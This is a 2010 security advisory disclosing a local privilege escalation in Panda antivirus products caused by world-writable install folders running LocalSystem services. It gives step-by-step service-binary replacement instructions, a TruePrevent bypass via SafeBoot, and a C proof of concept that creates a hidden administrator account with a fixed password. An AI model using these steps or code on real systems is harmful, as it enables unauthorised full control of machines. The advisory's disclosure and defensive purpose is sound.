______________________________________________
Security Advisory NSOADV-2010-001 (Version 2)
______________________________________________
______________________________________________
Title: Panda Security Local Privilege Escalation
Severity: Medium
Advisory ID: NSOADV-2010-001
Found Date: 02.2008
Date Reported: 30.11.2009
Release Date: 09.01.2010
Update Date: 20.01.2010
Author: Nikolas Sotiriu (lofi)
Website: http://sotiriu.de
Mail: nso-research at sotiriu.de
URL: http://sotiriu.de/adv/NSOADV-2010-001.txt
Vendor: Panda Security (http://www.pandasecurity.com/)
Affected Products: (Self tested)
-Panda Security for Business 4.04.10
-Panda Security for Business with Exchange
4.04.10
-Panda Security for Enterprise 4.04.10
-Panda Internet Security 2010 (15.01.00)
-Panda Global Protection 2010 (3.01.00)
-Panda Antivirus Pro 2010 (9.01.00)
-Panda Antivirus for Netbooks (9.01.00)
(Provided by Panda)
-Panda Global Protection 2009
-Panda Internet Security 2009
-Panda Antivirus Pro 2009
-Panda Internet Security 2008
-Panda Antivirus + Firewall 2008
-Panda Platinum 2007 Internet Security
-Panda Platinum 2006 Internet Security
Affected Component: Corporate Products:
-Panda Security for Desktops 4.05.10
-Panda Security for File Servers 8.04.10
Remote Exploitable: No
Local Exploitable: Yes
Patch Status: Vendor released a patch (See Solution)
Discovered by: Nikolas Sotiriu
Disclosure Policy: http://sotiriu.de/policy.html
Thanks to: Thierry Zoller: For the permission to use his
Policy
Background:
===========
Panda Security for <Product> is the security solution for companies that
need to protect their networks, mainly workstations and file servers.
Panda Security for Business is centrally managed thanks to the
AdminSecure Console, which allows monitoring the entire network,
protecting your critical assets against all types of threats and
optimizing productivity.
(Product description from Panda Website)
This vulnerability is similar to the following vulnerabilities in Panda
products, which where discovered earlier:
Sep 07 2006 3APA3A: http://www.securityfocus.com/bid/19891
Aug 02 2007 tarkus: http://www.securityfocus.com/bid/25186
Oct 31 2009 Protek: http://www.securityfocus.com/archive/1/507615
Nov 02 2009 Maxim: http://www.securityfocus.com/bid/36897
The earlier reported vulnerabilities only affected the Home user
products. But the business products had the same bug.
More interesting is, that Panda failed since 2006 each year by
releasing the new version with the same old bug.
Description:
============
1. 32Bit Version of Panda Security for Desktops/File Servers
+-----------------------------------------------------------
During installation of Panda Security for Desktops/File Servers the
permissions for installation folder
%ProgramFiles%\Panda Software\AVTC\
by default are set to Everyone:Full Control. Few services
(e.g. PAVSRV51.EXE) are started from this folder. Services are started
under LocalSystem account.
The 32bit Version of Panda Security for Desktops/File Servers
installs the TruePrevent package by default, which protects the files
in the installation directory from manipulation.
If the TruePrevent Service (Panda TPSrv) is not running the files are
completely unprotected.
A normal user is not able to stop the service, but normally he can boot
his workstation in SafeBoot mode, in which the TPSrv is not started and
all services files can be manipulated.
This can be exploited by:
a. Boot the PC in SafeBoot mode, by pressing F8 during the boot
process
b. Rename PAVSRV51.exe to PAVSRV51.old in Panda folder
c. Copy any application to PAVSRV51.exe
d. Reboot
Upon reboot trojaned application will be executed with LocalSystem
account.
Executable started as services:
+------------------------------
%ProgramFiles%\PANDA SOFTWARE\AVTC\PSKMsSvc.exe (Desktop only)
%ProgramFiles%\PANDA SOFTWARE\AVTC\PavSrv51.exe
%ProgramFiles%\PANDA SOFTWARE\AVTC\PavFnSvr.exe
%ProgramFiles%\PANDA SOFTWARE\AVTC\PSHost.exe
%ProgramFiles%\PANDA SOFTWARE\AVTC\PsImSvc.exe
%ProgramFiles%\PANDA SOFTWARE\AVTC\PsCtrlS.exe
%ProgramFiles%\PANDA SOFTWARE\AVTC\TPSrv.exe
2. 64Bit Version of Panda Security for Desktops/File Servers
+-----------------------------------------------------------
During installation of Panda Security for Desktops/File Servers the
permissions for installation folder
%ProgramFiles%\Panda Software\AVTC\
by default are set to Everyone:Full Control. Few services
(e.g. PavSrvx86.EXE) are started from this folder. Services are started
under LocalSystem account.
In the 64bit Version of Panda Security for Desktops/File Servers is no
TruePrevent package available, which protects the files in the
installation directory from manipulation.
There is no protection of service files. It's possible for unprivileged
user to replace service executable with the file of his choice to get
full access with LocalSystem privileges.
This can be exploited by:
a. Rename PavSrvX86.exe to PavSrvX86.old in Panda folder
b. Copy any application to PavSrvX86.exe
c. Reboot
Upon reboot trojaned application will be executed with LocalSystem
account.
Executable started as services:
+------------------------------
C:\Program Files (x86)\PANDA SOFTWARE\AVNT\PavSrvX86.exe
C:\Program Files (x86)\PANDA SOFTWARE\AVNT\PsImSvc.exe
C:\Program Files (x86)\PANDA SOFTWARE\AVNT\PskSvc.exe
C:\Program Files (x86)\PANDA SOFTWARE\AVNT\PsCtrlS.exe
3. Panda Internet Security/Global Protection/Antivirus Pro 20XX
+-----------------------------------------------------------------------
During installation of the Panda Security 20XX Products the
permissions for installation folder
%ProgramFiles%\panda security\panda <product>\
by default are set to Everyone:Full Control. Few services
(e.g. PAVSRV51.EXE) are started from this folder. Services are started
under LocalSystem account.
This products installs the TruePrevent package by default, which
protects the files in the installation directory from manipulation.
If the TruePrevent Service (Panda TPSrv) is not running the files are
completely unprotected.
A normal user is not able to stop the service, but normally he can boot
his workstation in SafeBoot mode, in which the TPSrv is not started and
all services files can be manipulated.
This can be exploited by:
a. Boot the PC in SafeBoot mode, by pressing F8 during the boot
process
b. Rename PAVSRV51.exe to PAVSRV51.old in Panda folder
c. Copy any application to PAVSRV51.exe
d. Reboot
Upon reboot trojaned application will be executed with LocalSystem
account.
Executable started as services:
+------------------------------
%ProgramFiles%\panda security\panda <product>\firewall\PSHOST.EXE
%ProgramFiles%\Panda Security\Panda <product>\PavFnSvr.exe
%ProgramFiles%\Panda Security\Panda <product>\PsImSvc.exe
%ProgramFiles%\Panda Security\Panda <product>\pavsrv51.exe
%ProgramFiles%\Panda Security\Panda <product>\PskSvc.exe
%ProgramFiles%\Panda Security\Panda <product>\PsCtrls.exe
%ProgramFiles%\Panda Security\Panda <product>\TPSrv.exe
4. Panda Antivirus for Netbooks
+------------------------------
During installation of the Panda Antivirus for Netbooks the
permissions for installation folder
%ProgramFiles%\panda security\Panda Antivirus for Netbooks\
by default are set to Everyone:Full Control. Few services
(e.g. PAVSRV51.EXE) are started from this folder. Services are started
under LocalSystem account.
This product installs the TruePrevent package by default, which protects
the files in the installation directory from manipulation.
If the TruePrevent Service (Panda TPSrv) is not running the files are
completely unprotected.
A normal user is not able to stop the service, but normally he can boot
his workstation in SafeBoot mode, in which the TPSrv is not started and
all services files can be manipulated.
This can be exploited by:
a. Boot the PC in SafeBoot mode, by pressing F8 during the boot
process
b. Rename PAVSRV51.exe to PAVSRV51.old in Panda folder
c. Copy any application to PAVSRV51.exe
d. Reboot
Upon reboot trojaned application will be executed with LocalSystem
account.
This product was not patched like the other 2010 products, so the
the following vulnerability already exists:
http://www.securityfocus.com/bid/36897
TruePrevent bypass: It can be bypassed using "Open" dialog in
"Quarantine" -> Add file" functionality.
Executable started as services:
+------------------------------
%ProgramFiles%\Panda Security\Panda Antivirus for Netbooks\PavFnSvr.exe
%ProgramFiles%\Panda Security\Panda Antivirus for Netbooks\PsImSvc.exe
%ProgramFiles%\Panda Security\Panda Antivirus for Netbooks\pavsrv51.exe
%ProgramFiles%\Panda Security\Panda Antivirus for Netbooks\PskSvc.exe
%ProgramFiles%\Panda Security\Panda Antivirus for Netbooks\PsCtrls.exe
%ProgramFiles%\Panda Security\Panda Antivirus for Netbooks\TPSrv.exe
Proof of Concept :
==================
#include <windows.h>
#include <stdio.h>
INT main( VOID )
{
CHAR szWinDir[ _MAX_PATH ];
CHAR szCmdLine[ _MAX_PATH ];
GetEnvironmentVariable( "WINDIR", szWinDir, _MAX_PATH );
printf( "Creating user \"owner\" with password \"PandaOWner123\"...\n" );
wsprintf( szCmdLine, "%s\\system32\\net.exe user owner PandaOWner123
/add", szWinDir );
system( szCmdLine );
printf( "Adding user \"owner\" to the local Administrators group...\n" );
wsprintf( szCmdLine, "%s\\system32\\net.exe localgroup Administrators
owner /add", szWinDir );
system( szCmdLine );
return 0;
}
Solution:
=========
Home User Products:
+------------------
Panda Advisory
http://www.pandasecurity.com/homeusers/support/card?id=80173&idIdioma=2
Panda Global Protection 2010 Hotfix
http://www.pandasecurity.com/resources/sop/PGP10/hfgp30906s22_r4.exe
Panda Internet Security 2010 Hotfix
http://www.pandasecurity.com/resources/sop/PIS10/hfp150906s25_r1.exe
Panda Antivirus Pro 2010 Hotfix
http://www.pandasecurity.com/resources/sop/PAVPro10/hft90906s21_r1.exe
Business Products:
+-----------------
Panda Advisory
http://www.pandasecurity.com/enterprise/support/card?id=40061&idIdioma=2
32Bit Version of Panda Security for Desktops/File Servers Hotfix
http://www.pandasecurity.com/resources/sop/AS0404/CSS_x86_SecurityFix.exe
64Bit Version of Panda Security for Desktops/File Servers Hotfix
http://www.pandasecurity.com/resources/sop/AS0404/CSS_x64_SecurityFix.exe
Disclosure Timeline (YYYY/MM/DD):
=================================
2008.02.??: Vulnerability found
2008.02.??: Reported to Vendor (no response)
2009.11.28: Tested the current versions and update this advisory
2009.11.30: Asked vendor for a PGP Key
2009.11.30: Vendor sent PGP Key
2009.11.30: Sent PoC, Advisory, Disclosure policy and planned disclosure
date (2009.12.17) to Vendor
2009.11.30: Vendor acknowledges the reception of the advisory
2009.12.15: Ask for a status update, because the planned release date is
2009.12.17.
2009.12.15: Panda Security Response Team informs me that they are
working on a fix and will give me a hotfix publishing date
tomorrow.
2009.12.16: Panda Security Response Team informs me that they need a few
more days to prepare the Hotfix publishing.
2009.12.17: Changed release date to 2009.12.23.
2009.12.21: Asked for a list of affected products
2009.12.21: Got a list with affected products and a the wish to delay
the release to the 2009.12.24.
2009.12.21: Changed release date to 2009.12.24.
2009.12.23: Asked for a list of affected products for the corporate
suites which was not part of the previously provides list.
[No response]
2010.01.04: Ask for a status update, because there is no advisory
published and i didn't got a response to my last mail.
2010.01.05: Panda send me the Link to there advisory (Home User
Products)
2010.01.05: Asked if the corporate products are patched.
[No response]
2010.01.07: Informed Panda, that i will release the Advisory on
2010.01.08
[No response]
2010.01.09: Release of Advisory draft Version 1
2010.01.11: Panda Security Response Team informs me that they didn't
published a Hotfix for the Corporate Products.
2010.01.20: Panda published the Advisory and Hotfix for the Corporate
Products
2010.01.20: Release of Advisory draft Version 2
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/